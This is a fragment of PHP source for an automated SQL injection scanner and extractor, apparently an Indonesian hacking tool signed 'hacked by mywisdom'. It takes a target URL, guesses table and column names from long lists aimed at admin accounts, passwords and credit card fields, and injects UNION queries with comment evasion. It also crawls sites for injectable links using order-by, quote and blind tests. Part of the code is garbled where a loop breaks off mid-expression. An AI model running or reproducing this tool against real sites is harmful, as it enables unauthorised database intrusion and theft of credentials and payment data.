$c0de,$akhir,$urlc0de,$datauser,$cekmysqluser2,$cekmysqluser,$trik2,$found2,$stringunion,$trik,$sqliurl,$jum2,$ch,$hasilcek2,$generalerror,$found,$jum,$panjang,$wzap,$handle,$file,$urlx,$url,$cek,$protokol,$tes,$tesurl,$page,$hasilcek,$error,$vulnerable; $fuzz_tables="tbladmins|sort|_wfspro_admin|4images_users|a_admin|account|accounts|adm|admin|admin_login|admin_user|admin_userinfo|administer|administrable|administrate|administration|administrator|administrators|adminrights|admins|adminuser|art|article_admin|articles|artikel|\xc3\x83\xc3\x9c\xc3\x82\xc3\xab|aut|author|autore|backend|backend_users|backenduser|bbs|book|chat_config|chat_messages|chat_users|client|clients|clubconfig|company|config|contact|contacts|content|control|cpg_config|cpg132_users|customer|customers|customers_basket|dbadmins|dealer|dealers|diary|download|Dragon_users|e107.e107_user|e107_user|forum.ibf_members|fusion_user_groups|fusion_users|group|groups|ibf_admin_sessions|ibf_conf_settings|ibf_members|ibf_members_converge|ibf_sessions|icq|images|index|info|ipb.ibf_members|ipb_sessions|joomla_users|jos_blastchatc_users|jos_comprofiler_members|jos_contact_details|jos_joomblog_users|jos_messages_cfg|jos_moschat_users|jos_users|knews_lostpass|korisnici|kpro_adminlogs|kpro_user|links|login|logi n_admin|login_admins|login_user|login_users|logins|logon|logs|lost_pass|lost_passwords|lostpass|lostpasswords|m_admin|main|mambo_session|mambo_users|manage|manager|mb_users|member|memberlist|members|minibbtable_users|mitglieder|movie|movies|mybb_users|mysql|mysql.user|name|names|news|news_lostpass|newsletter|nuke_authors|nuke_bbconfig|nuke_config|nuke_popsettings|nuke_users|\xc3\x93\xc3\x83\xc2\xbb\xc2\xa7|obb_profiles|order|orders|parol|partner|partners|passes|password|passwords|perdorues|perdoruesit|phorum_session|phorum_user|phorum_users|phpads_clients|phpads_config|phpbb_users|phpBB2.forum_users|phpBB2.phpbb_users|phpmyadmin.pma_table_info|pma_table_info|poll_user|punbb_users|pwd|pwds|reg_user|reg_users|registered|reguser|regusers|session|sessions|settings|shop.cards|shop.orders|site_login|site_logins|sitelogin|sitelogins|sites|smallnuke_members|smf_members|SS_orders|statistics|superuser|sysadmin|sysadmins|system|sysuser|sysusers|table|tables|tb_admin|tb_administrator|tb_login|tb_member|tb_members|tb_use r|tb_username|tb_usernames|tb_users|tbl|tbl_user|tbl_users|tbluser|tbl_clients|tbl_client|tblclients|tblclient|test|usebb_members|user|user_admin|user_info|user_list|user_login|user_logins|user_names|usercontrol|userinfo|userlist|userlogins|username|usernames|userrights|users|vb_user|vbulletin_session|vbulletin_user|voodoo_members|webadmin|webadmins|webmaster|webmasters|webuser|webusers|x_admin|xar_roles|xoops_bannerclient|xoops_users|yabb_settings|yabbse_settings|ACT_INFO|ActiveDataFeed|Category|CategoryGroup|ChicksPass|ClickTrack|Country|CountryCodes1|CustomNav|DataFeedPerformance1|DataFeedPerformance2|DataFeedPerformance2_incoming|DataFeedShowtag1|DataFeedShowtag2|DataFeedShowtag2_incoming|dtproperties|Event|Event_backup|Event_Category|EventRedirect|Events_new|Genre|JamPass|MyTicketek|MyTicketekArchive|News|Passwords by usage count|PerfPassword|PerfPasswordAllSelected|Promotion|ProxyDataFeedPerformance|ProxyDataFeedShowtag|ProxyPriceInfo|Region|SearchOptions|Series|Sheldonshows|StateList|States|SubCategory|Subjects|Survey|SurveyAnswer|SurveyAnswerOpen|SurveyQuestion|SurveyRespondent|sysconstraints|syssegments|tblRestrictedPasswords|tblRestrictedShows|Ticket System Acc Numbers|TimeDiff|Titles|ToPacmail1|ToPacmail2|Total Members|UserPreferences|uvw_Category|uvw_Pref|uvw_Preferences|Venue|venues|VenuesNew|X_3945|stone list|tblArtistCategory|tblArtists|tblConfigs|tblLayouts|tblLogBookAuthor|tblLogBookEntry|tblLogBookImages|tblLogBookImport|tblLogBookUser|tblMails|tblNewCategory|tblNews|tblOrders|tblStoneCategory|tblStones|tblUser|tblWishList|VIEW1|viewLogBookEntry|viewStoneArtist|vwListAllAvailable|CC_info|CC_username|cms_user|cms_users|cms_admin|cms_admins|user_name|jos_user|table_user|email|mail|bulletin|cc_info|login_name|admuserinfo|userlistuser_list|SiteLogin|Site_Login|UserAdmin|Admins|Login|Logins|administrasi|administrador|adm|yonetici"; $fuzz_columns="user|username|password|passwd|pass|cc_number|id|email|emri|fjalekalimi|pwd|user_name|customers_email_address|customers_password|user_password|name|user_pass|admin_user|admin_password|admin_pass|usern|user_n|users|login|logins|login_user|login_admin|login_username|user_username|user_login|auid|apwd|adminid|admin_id|adminuser|adminuserid|admin_userid|adminusername|admin_username|adminname|admin_name|usr|usr_n|usrname|usr_name|usrpass|usr_pass|usrnam|nc|uid|userid|user_id|myusername|mail|emni|logohu|punonjes|kpro_user|wp_users|emniplote|perdoruesi|perdorimi|punetoret|logini|llogaria|fjalekalimin|kodi|emer|ime|korisnik|korisnici|user1|administrator|administrator_name|mem_login|login_password|login_pass|login_passwd|login_pwd|sifra|lozinka|psw|pass1word|pass_word|passw|pass_w|user_passwd|userpass|userpassword|userpwd|user_pwd|useradmin|user_admin|mypassword|passwrd|admin_pwd|admin_passwd|mem_password|memlogin|e_mail|usrn|u_name|uname|mempassword|mem_pass|mem_passwd|mem_pwd|p_word|pword|p_assword|my name|my_username|my_name|my_password|my_email|cvvnumber|about|access|accnt|accnts|account|accounts|admin|adminemail|adminlogin|adminmail|admins|aid|aim|auth|authenticate|authentication|blog|cc_expires|cc_owner|cc_type|cfg|cid|clientname|clientpassword|clientusername|conf|config|contact|converge_pass_hash|converge_pass_salt|crack|customer|customers|cvvnumber]|data|db_database_name|db_hostname|db_password|db_username|download|e-mail|emailaddress|full|gid|group|group_name|hash|hashsalt|homepage|icq|icq_number|id_group|id_member|images|index|ip_address|last_ip|last_login|lastname|log|login_name|login_pw|loginkey|loginout|logo|md5hash|member|member_id|member_login_key|member_name|memberid|membername|members|new|news|nick|number|nummer|pass_hash|passwordsalt|passwort|personal_key|phone|privacy|pw|pwrd|salt|search|secretanswer|secretquestion|serial|session_member_id|session_member_login_key|sesskey|setting|sid|spacer|status|store|store1|store2|store3|store4|table_prefix|temp_pass|temp_password|temppass|temppasword| text|un|user_email|user_icq|user_ip|user_level|user_passw|user_pw|user_pword|user_pwrd|user_un|user_uname|user_usernm|user_usernun|user_usrnm|userip|userlogin|usernm|userpw|usr2|usrnm|usrs|warez|xar_name|xar_pass|lozinka|heslo|adgangskode|wachtwoord|contrasena|adm|administrador|yonetici"; $ujitabel="0x6861636b6564206279206d79776973646f6d"; $ujikolom="0x6e67656e746f74"; $bhk=base64_decode("aGFja2VkIGJ5IG15d2lzZG9t"); $todlah=base64_decode("bmdlbnRvdA=="); echo "\nType target url c0de from previous scan:\n"; //"\nType target url c0de from previous scan:\n"; $urlc0de = trim(fgets(STDIN)); //$urlc0de; $url=$urlc0de; cekhttp(); $urlc0de=$url; $oldurlc0de=$urlc0de; $url_bejat=$urlc0de; $defuse=$urlc0de; asal(); $evasion="--"; $c0de="c0de"; $daftar_tabel = explode("|",$fuzz_tables); $daftar_kolom = explode("|",$fuzz_columns); echo "\n[+]Please wait !!! trying to search table(s) inside this current database !!!\n"; //"\n[+]Please wait !!! trying to search table(s) inside this current database !!!\n"; foreach ($daftar_tabel as $trialtable) { asal(); $michael_angelo="+from+$trialtable--"; $alexander=str_replace($evasion,$michael_angelo,$defuse); $alexander=str_replace($c0de,$ujitabel,$alexander); $urlx=$alexander; basic_curl($urlx); if(strstr($page,$bhk)) { echo "\n[+] Found table name:$trialtable\n"; echo "\n--------------------------------\n"; echo "\n[+]Please wait! trying to search column(s) name inside table:$trialtable\n"; echo "\n--------------------------------\n"; $a=NULL; $a="\n[+] Found table name:$trialtable\n"; $a.="\n--------------------------------\n"; $a.="\n[+]Please wait! trying to search column(s) name inside table:$trialtable\n"; $a.= "\n--------------------------------\n"; tulisfile($a); $hit=0; while ($hit"," ",$gr); $gr=str_replace("src="," ",$gr); $gr=str_replace("codebase="," ",$gr); $gr=str_replace("<"," ",$gr); $gr=str_replace('"',"",$gr); $gr=trim($gr); //alur cek ? if(strstr($gr,"?") and strstr($gr,"=")) { if(strstr($gr,"http://")) { $gr=str_replace("href=","",$gr); if(strstr($gr,' ')) { $posisi=strpos($gr, ' ', 1); $posisi--; $gr=substr($gr,0,$posisi); } cek_order_by_100($url); cek_kutip($url); } else { if(strstr($gr,"href=")) { $gr=str_replace("href=","",$gr); if(strstr($gr,' ')) { $posisi=strpos($gr, ' ', 1); $posisi--; $gr=substr($gr,0,$posisi); $url=$gr; cek_order_by_100($url); cek_kutip($url); cek_blind($url); } $gr=$web.$gr; $url=$gr; cek_order_by_100($url); cek_kutip($url); cek_blind($url); } } } //eof alur ? //end } echo "\n------------------------------------------------\n"; echo "\nFound vulnerable link(s) at:\n"; $a= "\n------------------------------------------------\n"; $a.= "\nFound vulnerable link(s) at:\n"; tulisfile($a); $simpan2=explode("|",$simpan); if(sizeof($simpan2)>10) { echo $simpan2[0]."\n"; echo $simpan2[1]."\n"; echo $simpan2[2]."\n"; echo $simpan2[3]."\n"; echo $simpan2[4]."\n"; } else { foreach($simpan2 as $result) { echo $result."\n"; } } } function starter() { global $bisa,$bisajalan; switch($bisajalan) { case "passthru": if(empty($bisa)) { passthru('cls'); } else { passthru('clear'); } break; case "system": if(empty($bisa)) { system('cls'); } else { system('clear'); } break; case "exec": if(empty($bisa)) { exec('cls'); } else { exec('clear'); } break; case "shell_exec": if(empty($bisa)) { shell_exec('cls'); } else { shell_exec('clear'); } break; default: if(empty($bisa)) { passthru('cls'); } else { passthru('clear'); } } } utama(); ?>